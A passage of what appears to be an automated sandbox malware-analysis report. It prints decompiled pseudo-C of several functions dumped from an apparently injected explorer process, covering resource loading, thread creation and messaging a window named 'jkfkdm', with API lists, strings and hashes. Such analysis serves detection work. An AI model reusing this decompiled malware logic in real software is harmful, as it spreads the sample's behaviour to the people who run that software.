								_t30 = E01513C30( &(_v8[_t42]), _t39 - _t42, "%u;%u;%u",  *((intOrPtr*)(_t25 + _t33)));
								_t44 = _t44 + 0x18;
								_t42 = _t42 + _t30;
								__eflags = _t42;
							}
							_v12 = _v12 + 1;
							_t24 = _v12;
							_t33 = _t33 + 0x20;
							__eflags = _t24 -  *0x153795c; // 0x9
						} while (__eflags < 0);
					}
					E01515AF0(0xe, _v8);
					E01513990( &_v8, _t42);
					E01515C00(_t36, 0, "jkfkdm"); // executed
					_t22 = 0;
					__eflags = 0;
				} else {
					_t22 = _t17 | 0xffffffff;
				}
				return _t22;
			}

0x01503f7e
0x01503f7f
0x01503f82
0x01503f88
0x01503f8b
0x01503f8e
0x01503f91
0x01503f96
0x01503f97
0x01503f9c
0x01503fa6
0x01503fa9
0x01503faf
0x01503fb2
0x01503fb2
0x01503fb4
0x01503fb4
0x01503fb9
0x01503fbd
0x01503fbf
0x01503fc1
0x01503fcb
0x01503fd1
0x01503fd1
0x01503fd1
0x01503fd2
0x01503fd7
0x01503fdb
0x01503ff2
0x01503ff7
0x01503ffa
0x01503ffa
0x01503ffa
0x01503ffc
0x01503fff
0x01504002
0x01504005
0x01504005
0x0150400d
0x01504013
0x0150401d
0x01504029
0x01504031
0x01504031
0x01503f9e
0x01503f9e
0x01503f9e
0x01504036

APIs

Part of subcall function 01513960: HeapAlloc.KERNEL32(018E0000,00000008,0152C2F8,?,?,01513A10,015150C5,?,?,015150C6,0152C2F8,00000839), ref: 01513971

lstrcatA.KERNEL32(?,0152A3D0,0150661F,?,?,01909D00,01909D00,?,0150415D), ref: 01503FCB

Strings

jkfkdm, xrefs: 01504022
%u;%u;%u, xrefs: 01503FE6

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: AllocHeaplstrcat
String ID: %u;%u;%u$jkfkdm
API String ID: 1792520475-1173174127
Opcode ID: cef451020b2c6f9697cb42cb9e0416c098106cedb16b2b5ac5817b54e3d84411
Instruction ID: 9f06ad76a5ce367e5409c15c1fc68abc0bba5bc2ca4dc91d3d1ebaf47eb3c9d8
Opcode Fuzzy Hash: cef451020b2c6f9697cb42cb9e0416c098106cedb16b2b5ac5817b54e3d84411
Instruction Fuzzy Hash: E01121B3E00225BFCB229F99DC85E4DBBB9FB45624F020145F514AF295D7B08A00EB90

Uniqueness

Uniqueness Score: 100.00%

Function 003F2A60, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51
libraryUNIQUE

Download Yara Rule

C-Code - Quality: 33%

			E003F2A60() {
				void* _t4;
				void* _t8;
				void* _t10;
				void* _t13;

				LoadLibraryA("shlwapi.dll"); // executed
				E003F3EC0(); // executed
				while(0 != 0) {
				}
				_t4 = E003F7D90(0, 0); // executed
				if(_t4 >= 0) {
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					E003F9FB0(); // executed
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					E003F8AF0(1, 0); // executed
					_push(0);
					_t8 = E003F7A30(_t13, 0x40e030);
					__eflags = _t8;
					if(_t8 >= 0) {
						while(1) {
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						E003F25E0(_t13); // executed
						_t10 = E003F8C10(1);
						ExitProcess(0);
					} else {
						goto L13;
					}
					while(1) {
						L13:
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					return 3;
				}
				while(0 != 0) {
				}
				return 0;
			}

0x003f2a68
0x003f2a6e
0x003f2a73
0x003f2a77
0x003f2a7b
0x003f2a85
0x003f2a91
0x003f2a91
0x003f2a93
0x00000000
0x00000000
0x003f2a95
0x003f2a97
0x003f2a9c
0x003f2a9c
0x003f2a9e
0x00000000
0x00000000
0x003f2aa0
0x003f2aa6
0x003f2aae
0x003f2ab5
0x003f2abd
0x003f2abf
0x003f2ace
0x003f2ace
0x003f2ad0
0x00000000
0x00000000
0x003f2ad2
0x003f2ad4
0x003f2adb
0x003f2ae5
0x00000000
0x00000000
0x00000000
0x003f2ac1
0x003f2ac1
0x003f2ac1
0x003f2ac3
0x00000000
0x00000000
0x003f2ac5
0x00000000
0x003f2ac7
0x003f2a87
0x003f2a8b
0x00000000

APIs

LoadLibraryA.KERNEL32(shlwapi.dll), ref: 003F2A68

Part of subcall function 003F3EC0: HeapCreate.KERNEL32(00000000,00080000,00000000,?,003F3298), ref: 003F3ECC

ExitProcess.KERNEL32 ref: 003F2AE5

Strings

shlwapi.dll, xrefs: 003F2A63

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: CreateExitHeapLibraryLoadProcess
String ID: shlwapi.dll
API String ID: 1270678790-3792422438
Opcode ID: 3460253818bc4c7a8a058e1b3a2862eea676b18881b6289fa79065b3bf5f1e8b
Instruction ID: d2ffcb94869300f819be5fc3d2c4a4aa1e4cdc522c3312952ddc22fa3c8030db
Opcode Fuzzy Hash: 3460253818bc4c7a8a058e1b3a2862eea676b18881b6289fa79065b3bf5f1e8b
Instruction Fuzzy Hash: 87014F74799A0ED2EEB726B66D0373B30494B10745F2D4432BB0AA85C2FD95D91054BB

Uniqueness

Uniqueness Score: 100.00%

Function 0150723D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
windowUNIQUE

Download Yara Rule

C-Code - Quality: 100%

			E0150723D(int _a4, long _a8) {
				struct HWND__* _t4;

				_t4 = FindWindowA(0x1538b44, 0x1538b44); // executed
				if(_t4 != 0) {
					PostMessageA(_t4, _a4, 0x303baba, _a8); // executed
				}
				return 0;
			}

0x01507247
0x0150724f
0x0150725d
0x0150725d
0x01507266

APIs

FindWindowA.USER32(jkfkdm,jkfkdm,?,015072BE,00000000,BABA0101,01506684), ref: 01507247
PostMessageA.USER32(00000000,BABA0101,0303BABA,00000000,?,015072BE,00000000,BABA0101,01506684), ref: 0150725D

Strings

jkfkdm, xrefs: 01507240, 01507245, 01507246

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: FindMessagePostWindow
String ID: jkfkdm
API String ID: 2578315405-2652042395
Opcode ID: 8dc9fe6556ac04529e917c25f0fefffb1c74b95f70f8f9ae3dd59e118d7d075b
Instruction ID: f1d4a42f7c119eedacd1cdc10293a4a12e4269c37554904c46d8c2963970b9a4
Opcode Fuzzy Hash: 8dc9fe6556ac04529e917c25f0fefffb1c74b95f70f8f9ae3dd59e118d7d075b
Instruction Fuzzy Hash: 9BD0C9726052097FDF659EF8AC09D5B7F9EFB4A6057018410B929DF501DA32D5209760

Uniqueness

Uniqueness Score: 100.00%

Function 0151B300, Relevance: 5.1, APIs: 4, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E0151B300(signed int __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				void* _v8;
				char _v532;
				intOrPtr _v536;
				char _v564;
				long _v568;
				void* _t24;
				void* _t27;
				void* _t30;
				void* _t32;
				void* _t51;
				void* _t52;

				_v8 = 0xffffffff;
				if(_a4 != 0) {
					_t24 =  *0x153aa94(8, _a4); // executed
					_v8 = _t24;
					if(_v8 != 0xffffffff) {
						_t43 =  &_v564;
						E01513BA0( &_v564,  &_v564, 0, 0x224);
						_t52 = _t51 + 0xc;
						_v564 = 0x224;
						_t27 =  *0x153aa84(_v8,  &_v564); // executed
						if(_t27 != 0) {
							while(1) {
								E01516880(_t43,  &_v532);
								_t43 =  &_v532;
								_t30 = E01514060( &_v532, _a8);
								_t52 = _t52 + 0xc;
								if(_t30 == 0) {
									break;
								}
								_t32 =  *0x153aa58(_v8,  &_v564); // executed
								if(_t32 != 0) {
									continue;
								}
								CloseHandle(_v8);
								return 0;
							}
							if(_a12 != 0) {
								 *_a12 = _v536;
							}
							CloseHandle(_v8);
							return 1;
						}
						CloseHandle(_v8);
						return 0xfffffffd;
					}
					_v568 = GetLastError();
					return 0xfffffffe;
				}
				return __eax | 0xffffffff;
			}

0x0151b309
0x0151b314
0x0151b324
0x0151b32a
0x0151b331
0x0151b350
0x0151b357
0x0151b35c
0x0151b35f
0x0151b374
0x0151b37c
0x0151b38f
0x0151b396
0x0151b3a2
0x0151b3a9
0x0151b3ae
0x0151b3b3
0x00000000
0x00000000
0x0151b3e2
0x0151b3ea
0x00000000
0x00000000
0x0151b3f0
0x00000000
0x0151b3f6
0x0151b3b9
0x0151b3c4
0x0151b3c4
0x0151b3ca
0x00000000
0x0151b3d0
0x0151b382
0x00000000
0x0151b388
0x0151b339
0x00000000
0x0151b33f
0x00000000

APIs

GetLastError.KERNEL32 ref: 0151B333

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 8fecad62e6d3f85e47e713161171ae7b40121842b0631e92ff4701a8a9b2270a
Instruction ID: 82b57e15da5720940953054d211117ee3bd6bda4b1cc0ee9b6bdb029056b4f1a
Opcode Fuzzy Hash: 8fecad62e6d3f85e47e713161171ae7b40121842b0631e92ff4701a8a9b2270a
Instruction Fuzzy Hash: 98219475900209EBEB21EFA8D948B9D77B4BF44314F000A98E929DB2C4E7749B54DF51

Uniqueness

Uniqueness Score: 0.02%

Function 0151DB70, Relevance: 4.7, APIs: 3, Instructions: 182memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,00000014), ref: 0151DCE8
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 0151DD05
SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 0151DD23

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: DescriptorSecurity$AllocDaclInitializeLocal
String ID:
API String ID: 1946635556-0
Opcode ID: 454135f2201001aa55f8fb640f8f07db2493c09c012c6dcd2c70864d73bf517c
Instruction ID: 3249cf8e4715ddbc01f2f9a483dd906a9407e4e6eda25b2e479bfd7dd8d3a8c4
Opcode Fuzzy Hash: 454135f2201001aa55f8fb640f8f07db2493c09c012c6dcd2c70864d73bf517c
Instruction Fuzzy Hash: 86615AB1904348DBFB26CFE8C85CBAEBBB5BB04308F544919E511AF288C7FA5549CB51

Uniqueness

Uniqueness Score: 12.89%

Function 003F8290, Relevance: 4.7, APIs: 3, Instructions: 178
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E003F8290(void* __fp0, struct HINSTANCE__* _a4, CHAR* _a8, signed int _a12, signed int _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				long _v12;
				void* _v16;
				signed int _v20;
				signed int _v24;
				struct HRSRC__* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _t73;
				signed int _t83;
				signed int _t84;
				signed int _t87;
				signed int _t96;
				signed int _t114;
				void* _t129;
				void* _t130;
				void* _t131;
				void* _t136;

				_t136 = __fp0;
				_v28 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_v20 = 0;
				_v40 = 0;
				_v8 = 0;
				_v36 = 0xa;
				_v32 = 3;
				while(0 != 0) {
				}
				_v20 = 0;
				while(1) {
					__eflags = _v20 - 2;
					if(__eflags >= 0) {
						break;
					}
					_t96 = E003F8A50(__eflags, _t136, 0x4101bc, 0x1e, 0x32);
					_t130 = _t130 + 0xc;
					_v28 = FindResourceA(_a4, _a8, _t96 *  *0x40ffac +  *((intOrPtr*)(_t129 + _v20 * 4 - 0x20)));
					__eflags = _v28;
					if(_v28 == 0) {
						_t114 = _v20 + 1;
						__eflags = _t114;
						_v20 = _t114;
						continue;
					}
					break;
				}
				__eflags = _v28;
				if(_v28 != 0) {
					_v12 = SizeofResource(_a4, _v28);
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					_t102 = _v28;
					_v16 = LoadResource(_a4, _v28);
					__eflags = _v16;
					if(_v16 != 0) {
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							_t73 = E003F3F80(_t102, _v16, _v12);
							_t131 = _t130 + 8;
							_v8 = _t73;
							__eflags = _v8;
							if(_v8 != 0) {
								L47:
								__eflags = _a12;
								if(_a12 != 0) {
									 *_a12 = _v12;
								}
								return _v8;
							} else {
								goto L42;
							}
							while(1) {
								L42:
								__eflags = 0;
								if(0 == 0) {
									break;
								}
							}
							__eflags = _a24;
							if(_a24 != 0) {
								 *_a24 = 0xfffffffb;
							}
							L50:
							__eflags = _v40;
							if(_v40 != 0) {
								_push(0);
								E003F5C10( &_v40);
							}
							__eflags = 0;
							return 0;
						}
						asm("sbb eax, eax");
						_t83 = E003F5610(_a20, _v16, _v12, _a20,  ~(_a16 & 0x00000002) & 0x00000004); // executed
						_t131 = _t130 + 0x10;
						_v40 = _t83;
						__eflags = _v40;
						if(_v40 != 0) {
							_t84 = _v40;
							_t106 =  *((intOrPtr*)(_t84 + 0x428));
							_v12 =  *((intOrPtr*)(_t84 + 0x428));
							while(1) {
								__eflags = 0;
								if(0 == 0) {
									break;
								}
							}
							_t87 = E003F3EE0(_t106, _v12 + 1); // executed
							_t131 = _t131 + 4;
							_v8 = _t87;
							__eflags = _v8;
							if(_v8 != 0) {
								E003F4040(_v40, _v8,  *((intOrPtr*)(_v40 + 0x424)), _v12);
								_push(0);
								E003F5C10( &_v40); // executed
								goto L47;
							} else {
								goto L35;
							}
							while(1) {
								L35:
								__eflags = 0;
								if(0 == 0) {
									break;
								}
							}
							__eflags = _a24;
							if(_a24 != 0) {
								 *_a24 = 0xfffffffc;
							}
							goto L50;
						} else {
							goto L26;
						}
						while(1) {
							L26:
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						__eflags = _a24;
						if(_a24 != 0) {
							 *_a24 = 0xfffffffd;
						}
						goto L50;
					} else {
						goto L19;
					}
					while(1) {
						L19:
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					__eflags = _a24;
					if(_a24 != 0) {
						 *_a24 = 0xfffffffe;
					}
					return 0;
				} else {
					goto L10;
				}
				while(1) {
					L10:
					__eflags = 0;
					if(0 == 0) {
						break;
					}
				}
				__eflags = _a24;
				if(_a24 != 0) {
					 *_a24 = 0xffffffff;
				}
				return 0;
			}

0x003f8290
0x003f8296
0x003f829d
0x003f82a4
0x003f82ab
0x003f82b2
0x003f82b9
0x003f82c0
0x003f82c7
0x003f82ce
0x003f82d5
0x003f82d9
0x003f82db
0x003f82ed
0x003f82ed
0x003f82f1
0x00000000
0x00000000
0x003f82fc
0x003f8301
0x003f8321
0x003f8324
0x003f8328
0x003f82e7
0x003f82e7
0x003f82ea
0x00000000
0x003f82ea
0x00000000
0x003f832a
0x003f832e
0x003f8332
0x003f835e
0x003f8361
0x003f8361
0x003f8363
0x00000000
0x00000000
0x003f8365
0x003f8367
0x003f8375
0x003f8378
0x003f837c
0x003f839d
0x003f83a0
0x003f845e
0x003f8463
0x003f8466
0x003f8469
0x003f846d
0x003f8486
0x003f8486
0x003f848a
0x003f8492
0x003f8492
0x00000000
0x00000000
0x00000000
0x00000000
0x003f846f
0x003f846f
0x003f846f
0x003f8471
0x00000000
0x00000000
0x003f8473
0x003f8475
0x003f8479
0x003f847e
0x003f847e
0x003f8499
0x003f8499
0x003f849d
0x003f849f
0x003f84a5
0x003f84aa
0x003f84ad
0x00000000
0x003f84ad
0x003f83ae
0x003f83c0
0x003f83c5
0x003f83c8
0x003f83cb
0x003f83cf
0x003f83eb
0x003f83ee
0x003f83f4
0x003f83f7
0x003f83f7
0x003f83f9
0x00000000
0x00000000
0x003f83fb
0x003f8404
0x003f8409
0x003f840c
0x003f840f
0x003f8413
0x003f843e
0x003f8446
0x003f844c
0x00000000
0x00000000
0x00000000
0x00000000
0x003f8415
0x003f8415
0x003f8415
0x003f8417
0x00000000
0x00000000
0x003f8419
0x003f841b
0x003f841f
0x003f8424
0x003f8424
0x00000000
0x00000000
0x00000000
0x00000000
0x003f83d1
0x003f83d1
0x003f83d1
0x003f83d3
0x00000000
0x00000000
0x003f83d5
0x003f83d7
0x003f83db
0x003f83e0
0x003f83e0
0x00000000
0x00000000
0x00000000
0x00000000
0x003f837e
0x003f837e
0x003f837e
0x003f8380
0x00000000
0x00000000
0x003f8382
0x003f8384
0x003f8388
0x003f838d
0x003f838d
0x00000000
0x00000000
0x00000000
0x00000000
0x003f8334
0x003f8334
0x003f8334
0x003f8336
0x00000000
0x00000000
0x003f8338
0x003f833a
0x003f833e
0x003f8343
0x003f8343
0x00000000

APIs

FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 003F831B
SizeofResource.KERNEL32(00000000,00000000), ref: 003F8358
LoadResource.KERNEL32(00000000,00000000), ref: 003F836F

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: Resource$FindLoadSizeof
String ID:
API String ID: 507330600-0
Opcode ID: 43e12e42a915f59dd1400035a09837d12341c2c4408a7d306d043b28360a9104
Instruction ID: 4eb10e6c74605c9f46321c154e2eed969c2d44ac3c1cef9d236e9d9e90a01c1c
Opcode Fuzzy Hash: 43e12e42a915f59dd1400035a09837d12341c2c4408a7d306d043b28360a9104
Instruction Fuzzy Hash: 766161B990020EDFCF1ACF95C945BFE77B4BB08304F14855AEA11AB290DB759A41CF91

Uniqueness

Uniqueness Score: 0.58%

Function 01505BD3, Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 148
UNIQUE

Download Yara Rule

C-Code - Quality: 96%

			E01505BD3(void* __ecx, void* __edi, void* __esi, void* __eflags, signed int* _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				char _v32;
				char _t67;
				signed int _t68;
				signed int _t70;
				intOrPtr* _t71;
				signed int _t78;
				char _t79;
				signed int _t84;
				signed int _t97;
				signed int* _t101;
				void* _t103;
				void* _t104;
				void* _t129;
				void* _t131;
				void* _t132;

				_t103 = __ecx;
				_v20 = 0;
				_v32 = 0;
				_v16 = 0;
				_v8 = 0;
				_v32 = E0150574B(__eflags);
				_t67 = E01517B80(_t103, _t66, 1, "jkfkdm", 0); // executed
				_t132 = _t131 + 0x10;
				_v16 = _t67;
				if(_t67 != 0) {
					_t68 = E01517D40(_t67);
					_pop(_t104);
					__eflags = _t68;
					if(_t68 >= 0) {
						_t70 =  *(_v16 + 0x43c);
						__eflags = _t70;
						if(_t70 == 0) {
							goto L3;
						}
						_t78 = E01513960(_t104, _t70 * 0x18);
						_v8 = _t78;
						__eflags = _t78;
						if(_t78 != 0) {
							_t79 = _v16;
							_v24 = 0;
							__eflags =  *(_t79 + 0x43c);
							if( *(_t79 + 0x43c) <= 0) {
								L16:
								__eflags =  *_a4;
								if( *_a4 == 0) {
									E01513990( &_v8, 0);
								}
								goto L18;
							}
							_t129 = 0;
							__eflags = 0;
							do {
								_t84 = E015171A0( *((intOrPtr*)( *((intOrPtr*)(_t79 + 0x444)) + _v24 * 4)), 0x3b, 0,  &_v28);
								_t132 = _t132 + 0x10;
								_v12 = _t84;
								__eflags = _t84;
								if(_t84 != 0) {
									__eflags = _v28 - 4;
									if(__eflags == 0) {
										 *((intOrPtr*)(_t129 + _v8)) = E01513E60(__eflags,  *_t84);
										 *((intOrPtr*)(_t129 + _v8 + 4)) = E01513E60(__eflags,  *((intOrPtr*)(_v12 + 4)));
										 *((intOrPtr*)(_t129 + _v8 + 8)) = E01513E60(__eflags,  *((intOrPtr*)(_v12 + 8)));
										_t132 = _t132 + 0xc;
										 *((intOrPtr*)(_t129 + _v8 + 0x10)) = lstrlenA( *(_v12 + 0xc));
										 *((intOrPtr*)(_t129 + _v8 + 0xc)) = E01513A00(_v8,  *(_v12 + 0xc), lstrlenA( *(_v12 + 0xc)) + 1);
										_t97 = _v8;
										__eflags =  *(_t129 + _t97 + 0xc);
										if( *(_t129 + _t97 + 0xc) != 0) {
											_t101 = _a4;
											 *_t101 =  *_t101 + 1;
											__eflags =  *_t101;
										}
										E01517530( &_v12,  &_v28);
									}
								}
								_v24 = _v24 + 1;
								_t79 = _v16;
								_t129 = _t129 + 0x18;
								__eflags = _v24 -  *(_t79 + 0x43c);
							} while (_v24 <  *(_t79 + 0x43c));
							goto L16;
						}
						_v20 = 0xfffffffd;
						goto L18;
					}
					L3:
					_v20 = 0xfffffffe;
					goto L18;
				} else {
					_v20 = 0;
					L18:
					_t71 = _a8;
					if(_t71 != 0) {
						 *_t71 = _v20;
					}
					if(_v16 != 0) {
						_push(0);
						E015180D0( &_v16);
					}
					E01513990( &_v32, 0xfffffffe);
					return _v8;
				}
			}

0x01505bd3
0x01505bdc
0x01505bdf
0x01505be2
0x01505be5
0x01505bf6
0x01505bf9
0x01505bfe
0x01505c01
0x01505c06
0x01505c11
0x01505c16
0x01505c17
0x01505c19
0x01505c2a
0x01505c30
0x01505c32
0x00000000
0x00000000
0x01505c38
0x01505c3e
0x01505c41
0x01505c43
0x01505c51
0x01505c54
0x01505c57
0x01505c5d
0x01505d31
0x01505d34
0x01505d36
0x01505d3d
0x01505d43
0x00000000
0x01505d36
0x01505c6b
0x01505c6b
0x01505c6d
0x01505c80
0x01505c85
0x01505c88
0x01505c8b
0x01505c8d
0x01505c93
0x01505c97
0x01505ca3
0x01505cb4
0x01505cc6
0x01505ccd
0x01505cd8
0x01505cf6
0x01505cfa
0x01505cfd
0x01505d01
0x01505d03
0x01505d06
0x01505d06
0x01505d06
0x01505d10
0x01505d16
0x01505c97
0x01505d17
0x01505d1a
0x01505d20
0x01505d23
0x01505d23
0x00000000
0x01505d30
0x01505c45
0x00000000
0x01505c45
0x01505c1b
0x01505c1b
0x00000000
0x01505c08
0x01505c08
0x01505d44
0x01505d44
0x01505d49
0x01505d4e
0x01505d4e
0x01505d53
0x01505d58
0x01505d5a
0x01505d60
0x01505d67
0x01505d73
0x01505d73

Strings

jkfkdm, xrefs: 01505BEE, 01505C63

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: jkfkdm
API String ID: 1659193697-2652042395
Opcode ID: 9e2d2b7752c14e695e75604e8cbc7333a2bdded4655707e1006b2fb76433ea63
Instruction ID: c0a8606bc156e965dbf879f4adb171849d75543db08404abef4e1551acdaa5c3
Opcode Fuzzy Hash: 9e2d2b7752c14e695e75604e8cbc7333a2bdded4655707e1006b2fb76433ea63
Instruction Fuzzy Hash: AE516BB2D1020AAFDF12DFD8C8848AEBBF5FF44214B6045AAE515AF291E7309A41CF50

Uniqueness

Uniqueness Score: 100.00%

Function 01506FC0, Relevance: 4.6, APIs: 3, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E01506FC0(void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				void* __ecx;
				void* _t40;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t44;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t48;
				void* _t50;
				intOrPtr _t51;
				intOrPtr _t53;
				intOrPtr _t55;
				struct _SECURITY_ATTRIBUTES* _t57;
				intOrPtr _t59;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t66;
				void* _t67;
				intOrPtr _t68;
				void* _t72;
				intOrPtr _t74;
				void* _t75;
				void* _t77;
				intOrPtr _t82;
				intOrPtr _t84;
				void* _t85;
				intOrPtr _t91;
				void* _t93;
				struct _SECURITY_ATTRIBUTES* _t94;
				void* _t96;
				signed int _t98;
				void* _t101;

				_t96 = __esi;
				_push(_t75);
				_t94 = 0;
				_t40 = E01518890(_t75,  *0x15379c4, 0x7530);
				_t77 = _t93;
				if(_t40 >= 0) {
					_v8 = 0;
					_t72 = 0;
					do {
						_t41 =  *0x15379c0; // 0x19087e0
						_t42 =  *((intOrPtr*)(_t72 + _t41));
						if( *((intOrPtr*)(_t72 + _t41)) == _t94) {
							L6:
							_t43 =  *0x15379c0; // 0x19087e0
							if( *((intOrPtr*)(_t72 + _t43)) == _t94) {
								_push(_t96);
								_t98 = _v8 << 5;
								if(_a8 == _t94) {
									 *(_t98 + _t43 + 0xc) = _t94;
									_t44 =  *0x15379c0; // 0x19087e0
									 *(_t98 + _t44 + 0x10) = _t94;
									L13:
									_t45 =  *0x15379c0; // 0x19087e0
									 *((intOrPtr*)(_t98 + _t45 + 8)) = _a4;
									_t46 =  *0x15379c0; // 0x19087e0
									 *((intOrPtr*)(_t98 + _t46 + 0x14)) = _a16;
									_t47 = E01518810(_a16, _t94, 1); // executed
									_t82 =  *0x15379c0; // 0x19087e0
									 *((intOrPtr*)(_t98 + _t82 + 0x1c)) = _t47;
									_t48 =  *0x15379c0; // 0x19087e0
									_t28 = _t48 + _t98 + 4; // 0x19087e4
									_t50 = CreateThread(_t94, _t94, E01506F78, _t48 + _t98, _t94, _t28);
									_t84 =  *0x15379c0; // 0x19087e0
									 *(_t98 + _t84) = _t50;
									_t51 =  *0x15379c0; // 0x19087e0
									_t85 =  *(_t51 + _t98);
									if(_t85 != _t94) {
										SetThreadPriority(_t85, 0xffffffff);
										_t53 =  *0x15379c0; // 0x19087e0
										 *0x15379bc =  *0x15379bc + 1;
										E015188D0( *((intOrPtr*)(_t98 + _t53 + 0x1c)));
										_t55 =  *0x15379c0; // 0x19087e0
										_t94 = _t98 + _t55;
									} else {
										CloseHandle( *(_t51 + _t98 + 0x1c));
										_t59 =  *0x15379c0; // 0x19087e0
										_t34 = _t98 + 0xc; // 0x19087ec
										_t88 = _t59 + _t34;
										if( *((intOrPtr*)(_t59 + _t34)) != _t94) {
											E01513990(_t88,  *((intOrPtr*)(_t59 + _t98 + 0x10)));
											_pop(_t88);
										}
										E01513BA0(_t88, _t98 +  *0x15379c0, _t94, 0x20);
									}
									L18:
									L19:
									E015188D0( *0x15379c4);
									_t57 = _t94;
									L20:
									return _t57;
								}
								_t74 = _a12;
								_t62 = E01513960(_t77, _t74);
								_t91 =  *0x15379c0; // 0x19087e0
								 *((intOrPtr*)(_t98 + _t91 + 0xc)) = _t62;
								_t63 =  *0x15379c0; // 0x19087e0
								_t64 =  *((intOrPtr*)(_t98 + _t63 + 0xc));
								if( *((intOrPtr*)(_t98 + _t63 + 0xc)) == _t94) {
									goto L18;
								}
								E01513AC0(_t91, _t64, _a8, _t74);
								_t66 =  *0x15379c0; // 0x19087e0
								_t101 = _t101 + 0xc;
								 *((intOrPtr*)(_t98 + _t66 + 0x10)) = _t74;
								goto L13;
							}
							goto L7;
						}
						_t67 = E01506EF8(_t42);
						_pop(_t77);
						if(_t67 != 0) {
							goto L7;
						}
						_t68 =  *0x15379c0; // 0x19087e0
						E01506F12(_t77, _t96, _t68 + _t72, _t94);
						_pop(_t77);
						goto L6;
						L7:
						_v8 = _v8 + 1;
						_t72 = _t72 + 0x20;
					} while (_t72 < 0x1000);
					goto L19;
				}
				_t57 = 0;
				goto L20;
			}

0x01506fc0
0x01506fc3
0x01506fd0
0x01506fd2
0x01506fd8
0x01506fdb
0x01506fe5
0x01506fe8
0x01506fea
0x01506fea
0x01506fef
0x01506ff4
0x01507011
0x01507011
0x01507019
0x0150702e
0x01507032
0x01507038
0x01507077
0x0150707b
0x01507080
0x01507084
0x01507084
0x0150708c
0x01507090
0x0150709b
0x0150709f
0x015070a6
0x015070ac
0x015070b0
0x015070b7
0x015070c4
0x015070ca
0x015070d0
0x015070d3
0x015070d8
0x015070dd
0x01507119
0x0150711f
0x01507128
0x0150712e
0x01507133
0x01507139
0x015070df
0x015070e3
0x015070e9
0x015070ee
0x015070ee
0x015070f4
0x015070fb
0x01507101
0x01507101
0x0150710c
0x01507111
0x0150713c
0x0150713d
0x01507143
0x01507149
0x0150714c
0x0150714e
0x0150714e
0x0150703a
0x0150703e
0x01507044
0x0150704a
0x0150704e
0x01507053
0x01507059
0x00000000
0x00000000
0x01507064
0x01507069
0x0150706e
0x01507071
0x00000000
0x01507071
0x00000000
0x01507019
0x01506ff7
0x01506ffc
0x01506fff
0x00000000
0x00000000
0x01507001
0x0150700a
0x01507010
0x00000000
0x0150701b
0x0150701b
0x0150701e
0x01507021
0x00000000
0x01507029
0x01506fdd
0x00000000

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: ObjectSingleWait
String ID:
API String ID: 24740636-0
Opcode ID: 81f3699c94ef1a9ea46a63be672b8f442af5477ad025c1fa7ed7b4e588c3df8b
Instruction ID: fc5b9f9394cc3269d47203e25c50556f9ab91744e1bbc6f43c2e8c01993ecc00
